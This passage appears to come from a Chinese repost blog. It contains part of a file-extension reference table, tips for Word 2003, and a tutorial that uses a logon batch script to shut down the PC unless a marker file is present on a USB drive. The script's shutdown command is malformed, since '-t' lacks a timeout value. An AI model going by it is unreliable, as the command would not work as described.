图象文件 画图/看图软件 .jpeg 压缩过的图象文件 画图/看图软件 .jpg 压缩过的图象文件 画图/看图软件 .js javascript .lnk 快捷方式连接文件 连接文件的相应程序 .m3u Winamp播放列表 Winamp .mid 声音文件 Windows media Player .mov Quicktime影像文件 Quick Time .mp3 压缩音乐文件 Winamp .mpeg 影像 Windows media Player .mpg 影像 Windows media Player .njx 南极星文档 南极星文字处理 .pcb 电子电路图设计文件 Protel PCB .pdf 便携式文档格式，SupFree0内含图片文字等等 Adobe Acrobat, Adobe Acrobat Reader .pm5 PageMaker 5 排版文件 Page Maker .ppt Power Point 文件 Microsoft Power Point .ps GhostScript .psd Photoshop文件 Adobe Photoshop .pub Publisher排版文件 Microsoft Publisher .qt Quicktime影像文件 Quick Time .ra Real Audio声音文件 Real Audio .ram Real Audio影像文件 Real Audio .rar 压缩文件 Winrar .rsf Richwin 字体文件 .sch 电子原理图设计文件 Protel Schematic .scr 屏保文件 .sea Macintosh 启动文件 .sit 压缩 Stuffit Expander .swf Flash动画文件 浏览器加装Macromedia flash 插件 .sys 系统文件 .tar UNIX压缩文件 Winzip .tif 高质量图象文件 画图/看图软件 .tiff 高质量图象文件 画图/看图软件 .tmp 暂存文件 可以删掉 .ttf 字体文件 .txt 纯文本文件 笔记本或全部文字处理系统 .vbs Visual Basic 编程文件 Microsoft Viasual Basic .viv VIVO影像文件 浏览器加装VIVO 插件 .vqf 压缩声音文件 Yamaha SoundVQ Player .wav 未压缩的声音文件 Windows media Player .wk1 Lotus 123 试算软件文件 Lotus 123, Excel .wq1 Q-Pro 试算软件文件 Q-Pro, Excel .wri Write文字文档 Word .xls Excel 试算软件文件 Microsoft Excel .Z UNIX压缩文件 Winzip .zip 压缩文件 Winzip 加速十倍～Word 2003快速输入的技巧 2009-04-27 17:20:33 被5人转藏 | 小贴士:QQ秘籍训练营,用QQ懂QQ 加速十倍～Word 2003快速输入的技巧 [日期:2008-07-04] 来源:作者: [字体:[url=javascript:ContentSize(16)]大[/url] [url=javascript:ContentSize(0)]中[/url] [url=javascript:ContentSize(12)]小[/url]] 经常进行文字处理的朋友一定不会拒绝word2003给我们带来的更高更快更强的体验，让我们来看看，还有哪些实用的tips没有引起你的注意。 有人说，“输”能生巧嘛，但一些技巧，只有知道了才能用好。在此三个锦囊，等候你来打量。 “制造”锦囊 快速给文字加下划线 如果在word文档中，有一段带有空格键的文本，而现在只想给该段文本中的文字加上下划线，并且忽略其中的空格。此时，请选中该段文本，然后按下“Ctrl+Shift+W”键就搞定了。 用特殊符号快速绘制分隔线 在用word编辑文档时，时常会用到一些直线或是虚线作为文档的横向分隔线，常用的绘制方法是插入剪贴画中的水平线来实现，但这种方法太烦琐。其实在Word中可以利用一些特殊符号加回车键的办法来快速绘制常用的横向分隔线。连续输入3个以上的“*”，再按回车键，则可以得到一条虚线;换成输入“=”，可以得到双直线;换成输入“,”， 可以得到一条波浪线;那么换成输入“#”的话，就能得到中间加粗的三直线。 一天不落输星期 怎样输入编号，大家应该不会陌生，但当我们想制作课程表或是备忘录等需要象输入编号一样依次输入星期的时候，一个一个地输入未免太浪费劳动力了。其实要偷懒也不难:在“格式”的“项目和编号”对话框里，选择“编号”选卡，然后进入“自定义”找到“编号格式”。这时我们可以看到，word允许我们输入A、B、C„„;甲、乙、丙„„;壹、贰、叁等编号样式，那么，试一试在“编号格式”里输入“星期一”会出现什么效果。一次使用，终身受用。当我们再次打开“项目和编号”的编号选卡时，会发现星期一、星期二、星期三„„的编号样式已经被保存了，如果我们还需要使用这个编号的时候，直接调用就可以了。 浓缩图标汇我世界 想要在word中展现我们再熟悉不过的鼠标、键盘、摄像头吗,想要将一些生活味道很浓的物品搬上我们的屏幕吗,还是想让形象的警示标志为我们的文档增色,试试设置字体为Webdings和Wingdings，可以马上实现呦。但是一定要注意，要切换到非中文输入法状态下才能实现。 “变身”锦囊 格式刷任我刷 格式刷的使用，朋友们一定不会陌生了，但是默认的情况下，点击一下格式刷只能使用一次。想要实 现一次选中，任我狂刷吗,双击试试～只要能看到光标旁边的小刷子，想怎么刷，就怎么刷～而且，请“神”容易，送“神”也不难，Esc键帮你送“神”到家。 电脑用U盘加锁 2009-04-27 13:55:53 被5人转藏 | 小贴士:你不理财，财不理你:理财从头学起 1、在U盘里新建一个文件，类型随意，文件名随意，比如007.txt。注意要记住这个文件名，如果没带U盘就用别人的新建一个同名同类型的文件，然后就可以开机了 2、在桌面上新建一个记事本，输入下面内容 if not exist g:\007.txt shutdown -s -t -c "主人不在，请勿使用"(当然双引号里的内容可以改，如果不想要任何内容的话，那就把-c"*****"这些内容去了就好了) 依次选择:文件——另存为——在保存类型中选择“所有文件”，文件名为:logon.bat，这样就建立了一个脚本登录文件 3、开始——运行——gpedit.msc——用户配置——windows设置——脚本 双击右侧窗口的“登录”项，弹出登录属性窗口，单击“显示文件”按钮打开默认脚本存放目录，找到桌面上建立的logon.bat文件剪切至此目录中，单击“添加”按钮添加上面的脚本 4、OK了～